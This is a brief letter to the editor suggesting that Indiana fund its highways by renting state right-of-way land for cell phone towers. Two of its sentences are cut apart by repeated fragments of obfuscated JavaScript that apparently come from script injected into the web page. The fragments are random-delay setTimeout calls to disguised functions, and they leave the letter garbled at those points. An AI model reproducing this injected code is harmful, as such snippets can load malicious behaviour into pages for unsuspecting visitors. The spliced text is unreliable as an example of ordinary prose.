LETTER TO THE EDITOR IDEA FOR NEW INDIANA HIGHWAY FUNDING

My local newspaper had a story that Indiana is looking for ways to reverse declining highway funding. I have an idea to help.

License cell phone towers on the state’s right of way for our highways. This could be done where the right of way is wide enough to allow for traffic dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and a tower. The rental fees that would otherwise go to the owner of ldom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and near a highway would go to the state.

This would not solve the entire financial problem. But, some combination of ideas, including this one, should solve Indiana’s highway funding problem.
